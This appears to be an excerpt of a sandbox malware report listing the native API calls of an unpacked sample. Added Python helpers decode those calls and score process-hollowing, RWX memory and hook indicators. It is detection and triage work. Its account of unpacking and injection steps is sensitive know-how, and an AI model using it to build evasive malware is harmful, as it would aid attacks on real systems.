                                                                                • Opcode Fuzzy Hash: 484c9e5f2c93bf47596e3c6f4954b22454ae253e1a64b48f16b01ea7e63a0146
                                                                                • Instruction Fuzzy Hash: 6D415974A14608EBDB04DFA4C880BDEB3B6EF58300F109169E119EB390E779AE45CB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%
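
The function blocks above list the native calls the sandbox found in the unpacked code at 0x433000 with their arguments as raw hex: NtCreateFile at 00434709; NtWriteFile, NtCreateSection and NtClose at 00435737 to 00435803; NtClose, NtFreeVirtualMemory and NtUnmapViewOfSection at 0043562C to 004356A7; NtTerminateProcess at 0043832D; NtAllocateVirtualMemory at 004340C1. The Python helper below is an added example and not part of the Joe Sandbox report. It parses lines in exactly that "Name.Module(args), ref: address" format, decodes the flag arguments against the documented NT constants (so 01000000 in NtCreateSection reads as SEC_IMAGE, 00003000 and 00000004 in NtAllocateVirtualMemory as MEM_COMMIT|MEM_RESERVE with PAGE_READWRITE, 00008000 in NtFreeVirtualMemory as MEM_RELEASE, and 80100000, 00000001 and 00000060 in NtCreateFile as GENERIC_READ|SYNCHRONIZE, FILE_OPEN and FILE_SYNCHRONOUS_IO_NONALERT|FILE_NON_DIRECTORY_FILE), and reports whether the set of primitives behind the "Sample uses process hollowing technique" signature (an image section, an unmapped view, freshly committed memory) is all present. Assumptions: argument positions follow the documented ntdll prototypes, "?" is an argument the sandbox could not recover, and the process-handle value 000000FF is left as printed rather than decoded. The input lines are copied from this page; because they come from different functions, a complete set of primitives indicates capability, not a proven runtime call order.

```python
import re

# Constructed input: the "APIs" entries copied from the function blocks of this
# report (Joe Sandbox format "Name.Module(args), ref: address"; "?" = unknown arg).
REPORT_API_LINES = [
    "NtCreateFile.NTDLL(?,80100000,00000018,?,00000000,00000080,00000007,00000001,00000060,00000000,00000000), ref: 00434709",
    "NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00435737",
    "NtCreateSection.NTDLL(00000000,000F001F,00000000,00000000,00000002,01000000,?), ref: 0043576F",
    "NtClose.NTDLL(?,?,00000001,?,00000030,00000000,?,00000001), ref: 00435803",
    "NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 00435695",
    "NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 004356A7",
    "NtTerminateProcess.NTDLL(000000FF,00000000), ref: 0043832D",
    "NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00007FFF,00003000,00000004), ref: 004340C1",
]

LINE_RE = re.compile(r"^(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")

# Documented NT constants; bit tables are kept in insertion order for stable output.
PAGE_PROT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
SEC_ATTRS = {0x01000000: "SEC_IMAGE", 0x08000000: "SEC_COMMIT"}
MEM_TYPES = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x8000: "MEM_RELEASE"}
FILE_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE", 0x00100000: "SYNCHRONIZE"}
FILE_SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
FILE_OPTS = {0x20: "FILE_SYNCHRONOUS_IO_NONALERT", 0x40: "FILE_NON_DIRECTORY_FILE"}
DISPOSITION = {0: "FILE_SUPERSEDE", 1: "FILE_OPEN", 2: "FILE_CREATE",
               3: "FILE_OPEN_IF", 4: "FILE_OVERWRITE", 5: "FILE_OVERWRITE_IF"}


def parse_line(line):
    """Split one report API line into api name, module, int args (None for '?') and call-site address."""
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a report API line: {line!r}")
    raw = m["args"].split(",") if m["args"] else []
    args = [None if a == "?" else int(a, 16) for a in raw]
    return {"api": m["api"], "module": m["mod"], "args": args, "ref": int(m["ref"], 16)}


def flags(value, table):
    """Render a bitmask with the names in table; leftover unknown bits are shown in hex."""
    if value is None:
        return "?"
    names = [name for bit, name in table.items() if value & bit]
    known = 0
    for bit in table:
        known |= bit
    if value & ~known:
        names.append(hex(value & ~known))
    return "|".join(names) or "0"


def decode(call):
    """Translate the raw hex arguments of the injection-relevant calls into named constants."""
    api, a = call["api"], call["args"]

    def arg(i):
        return a[i] if i < len(a) else None

    d = {}
    if api == "NtCreateFile":
        # (FileHandle, DesiredAccess, ObjectAttributes, IoStatusBlock, AllocationSize,
        #  FileAttributes, ShareAccess, CreateDisposition, CreateOptions, EaBuffer, EaLength)
        d["access"] = flags(arg(1), FILE_ACCESS)
        d["share"] = flags(arg(6), FILE_SHARE)
        d["disposition"] = DISPOSITION.get(arg(7), hex(arg(7)) if arg(7) is not None else "?")
        d["options"] = flags(arg(8), FILE_OPTS)
    elif api == "NtCreateSection":
        # (SectionHandle, DesiredAccess, ObjectAttributes, MaximumSize,
        #  SectionPageProtection, AllocationAttributes, FileHandle)
        d["access"] = "SECTION_ALL_ACCESS" if arg(1) == 0x000F001F else flags(arg(1), {})
        d["protect"] = PAGE_PROT.get(arg(4), flags(arg(4), {}))
        d["alloc_attrs"] = flags(arg(5), SEC_ATTRS)
    elif api == "NtAllocateVirtualMemory":
        # (ProcessHandle, BaseAddress, ZeroBits, RegionSize, AllocationType, Protect)
        d["region_size"] = arg(3)
        d["alloc_type"] = flags(arg(4), MEM_TYPES)
        d["protect"] = PAGE_PROT.get(arg(5), flags(arg(5), {}))
    elif api == "NtFreeVirtualMemory":
        # (ProcessHandle, BaseAddress, RegionSize, FreeType)
        d["free_type"] = flags(arg(3), MEM_TYPES)
    return d


# Primitives that together make up the process-hollowing pattern the report's
# signature block flags: an image section built from a written file, a view
# unmapped in the target, and freshly committed memory for the replacement image.
# Heuristic chosen for this example; the report itself does not publish its rule.
HOLLOWING_PRIMITIVES = {
    "NtCreateSection": lambda d: "SEC_IMAGE" in d["alloc_attrs"],
    "NtUnmapViewOfSection": lambda d: True,
    "NtAllocateVirtualMemory": lambda d: "MEM_COMMIT" in d["alloc_type"],
}


def hollowing_indicators(lines):
    """Return one 'Api @ callsite: decoded-args' string per matching primitive found in lines."""
    hits = []
    for line in lines:
        call = parse_line(line)
        check = HOLLOWING_PRIMITIVES.get(call["api"])
        if check is not None:
            d = decode(call)
            if check(d):
                hits.append(f"{call['api']} @ {call['ref']:08X}: {d}")
    return hits


def all_primitives_present(lines):
    """True when every primitive in HOLLOWING_PRIMITIVES was seen with matching flags."""
    seen = {h.split(" @ ")[0] for h in hollowing_indicators(lines)}
    return seen == set(HOLLOWING_PRIMITIVES)


if __name__ == "__main__":
    for line in REPORT_API_LINES:
        c = parse_line(line)
        print(f"{c['api']:<24} @ {c['ref']:08X} {decode(c)}")
    print("hollowing primitives complete:", all_primitives_present(REPORT_API_LINES))
```

Run against the lines copied above, the script decodes the NtCreateSection call as SECTION_ALL_ACCESS, PAGE_READONLY, SEC_IMAGE and reports all three hollowing primitives present; pasting the "APIs" lines of a different report (or only the first few lines of this one, which lack NtUnmapViewOfSection and NtAllocateVirtualMemory) gives an incomplete set. Unknown bits are never silently dropped: they are appended in hex so a flag outside the tables is visible in the output.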

                                                                                APIs
                                                                                • SetUnhandledExceptionFilter.KERNELBASE(Function_00024E64), ref: 00424EAF
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID:
                                                                                • API String ID: 3192549508-0
                                                                                • Opcode ID: 45cbfcb17a86cfbcb73e49fedf9306be7215eada607a00ae90d99109fb0abd0f
                                                                                • Instruction ID: e94ade083b1b830b99426830c97f28827ac6bcc198d0918bbfe04d4f608174cc
                                                                                • Opcode Fuzzy Hash: 45cbfcb17a86cfbcb73e49fedf9306be7215eada607a00ae90d99109fb0abd0f
                                                                                • Instruction Fuzzy Hash: DCA002B8A853128FB74C6F61FD8A5047AB0FAC5713F615076F941812ACEF7415809A1D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • VirtualProtect.KERNELBASE(00433638,00008000,00000040,?), ref: 00412798
                                                                                • glCopyPixels.OPENGL32(00000020,0000003F,00000037,00000059,00001800), ref: 004127CA
                                                                                • glFlush.OPENGL32 ref: 004127D0
                                                                                • glDisableClientState.OPENGL32(00008075), ref: 004127DB
                                                                                • glCullFace.OPENGL32(00000404), ref: 004127E6
                                                                                • glClear.OPENGL32(00004000), ref: 004127F1
                                                                                • GrayStringA.USER32(00000000,00000001,00438158,00000001,00000001,00000001,00000001,00000001,00000001), ref: 00412813
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: ClearClientCopyCullDisableFaceFlushGrayPixelsProtectStateStringVirtual
                                                                                • String ID: $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$
:$:$:$:$:$:$:$:$:$:$:$:$:$:$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$
W$W$W$W$W$W$W$W$W$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$
s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~
                                                                                • API String ID: 207726862-3448699068
                                                                                • Opcode ID: 061ec756dfa1b11fdc7e196d4368c361a6216114ddafc95f6a3fd9683155030a
                                                                                • Instruction ID: 60c091a216035b857e658e3cb5e84d720e9581c9c2b230ee83090a1a4fba29e5
                                                                                • Opcode Fuzzy Hash: 061ec756dfa1b11fdc7e196d4368c361a6216114ddafc95f6a3fd9683155030a
                                                                                • Instruction Fuzzy Hash: BC745B1090CBEAC8DB32827C5C587CDAE611B23325F4843D9D1ED2A6D2C7B50B96DF66
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%
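The record above (call site 00412798) is the most telling entry in this part of the listing: VirtualProtect sets PAGE_EXECUTE_READWRITE (0x40) on 0x8000 bytes at 0x00433638, inside the sample's own image, and is immediately followed by five OpenGL calls and a GrayStringA that have no plausible purpose in a dropper. The dump source of the RtlAllocateHeap function further down is the region at 0x433000 whose dump name carries 00000040, consistent with unpacked code living exactly where that call pointed. The script below is an added example, not part of the Joe Sandbox report: it parses the "Api.MODULE(args), ref: addr" lines of a function record and scores the patterns an analyst looks for (RWX protection changes on the image, executable VirtualAlloc, SetWindowsHookEx, decoy calls beside the unpacker). The image range, the decoy-module set and the severity labels are assumptions of the example; the three input records are copied from this listing, with the VirtualAlloc(…,00002000,00000004) record included as a negative case.

```python
import re
from dataclasses import dataclass

# winnt.h page-protection bits
PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY = 0x10, 0x20, 0x40, 0x80
EXEC_MASK = PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
WRITE_EXEC_MASK = PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY

# Assumption: image span taken from the dump sources in the listing (0x400000 .. 0x450000 plus one page).
IMAGE_RANGE = (0x00400000, 0x00451000)
# Assumption: modules with no role in an unpacker; calls into them beside a protection change count as padding.
DECOY_MODULES = {"OPENGL32"}
HOOK_APIS = {"SetWindowsHookExA", "SetWindowsHookExW"}

# One listing line, e.g. "VirtualProtect.KERNELBASE(00433638,00008000,00000040,?), ref: 00412798"
API_LINE = re.compile(
    r"(?P<api>\w+)\.(?P<module>\w+)"        # Api.MODULE
    r"(?:\((?P<args>[^)]*)\))?"             # optional (arg,arg,...)
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"  # call-site address
)

@dataclass
class ApiCall:
    api: str
    module: str
    args: list  # int for 8-hex-digit words, None for "?", str for anything else
    ref: int    # call-site address

@dataclass
class Finding:
    ref: int
    severity: str
    reason: str

def _arg(tok):
    tok = tok.strip()
    if tok == "?":
        return None
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else tok

def parse_api_lines(text):
    # Every API line of one function record; headers and dump-source lines do not match and are skipped.
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if m:
            raw = m.group("args")
            args = [_arg(a) for a in raw.split(",")] if raw else []
            calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls

def _hex(v):
    return f"0x{v:08X}" if isinstance(v, int) else "?"

def triage(calls):
    # Score the calls of a single function; findings come back sorted by call site.
    out = []
    for c in calls:
        # VirtualProtect(lpAddress, dwSize, flNewProtect, lpflOldProtect)
        if c.api == "VirtualProtect" and len(c.args) >= 3 and isinstance(c.args[2], int):
            prot = c.args[2]
            if prot & EXEC_MASK:
                addr = c.args[0]
                inside = isinstance(addr, int) and IMAGE_RANGE[0] <= addr < IMAGE_RANGE[1]
                out.append(Finding(c.ref, "high" if prot & WRITE_EXEC_MASK else "medium",
                    f"VirtualProtect sets 0x{prot:02X} on {_hex(c.args[1])} bytes at {_hex(addr)} "
                    f"({'inside' if inside else 'outside'} the image): code made executable in place"))
        # VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect)
        elif c.api == "VirtualAlloc" and len(c.args) >= 4 and isinstance(c.args[3], int):
            if c.args[3] & EXEC_MASK:
                out.append(Finding(c.ref, "high", f"VirtualAlloc with executable protection 0x{c.args[3]:02X}"))
        elif c.api in HOOK_APIS:
            out.append(Finding(c.ref, "medium", f"{c.api}: hook installation (keylogging / injection vector)"))
    decoys = [c for c in calls if c.module.upper() in DECOY_MODULES]
    if decoys and any(c.api in ("VirtualProtect", "VirtualAlloc") for c in calls):
        out.append(Finding(decoys[0].ref, "info",
            f"{len(decoys)} {'/'.join(sorted(DECOY_MODULES))} calls beside a protection change: likely junk API padding"))
    return sorted(out, key=lambda f: f.ref)

# Constructed input: records copied from the listing on this page.
UNPACKER_RECORD = """\
• VirtualProtect.KERNELBASE(00433638,00008000,00000040,?), ref: 00412798
• glCopyPixels.OPENGL32(00000020,0000003F,00000037,00000059,00001800), ref: 004127CA
• glFlush.OPENGL32 ref: 004127D0
• glDisableClientState.OPENGL32(00008075), ref: 004127DB
• glCullFace.OPENGL32(00000404), ref: 004127E6
• glClear.OPENGL32(00004000), ref: 004127F1
• GrayStringA.USER32(00000000,00000001,00438158,00000001,00000001,00000001,00000001,00000001,00000001), ref: 00412813
"""
ALLOCATOR_RECORD = """\
• HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,00425348,00000000,?,?,?,00422CBF), ref: 004255DC
• VirtualAlloc.KERNELBASE(00000000,00100000,00002000,00000004,?,00422CBF), ref: 004255F6
"""
HOOK_RECORD = """\
• GetCurrentThreadId.KERNEL32 ref: 0042E19D
• SetWindowsHookExA.USER32 ref: 0042E1AD
"""
```

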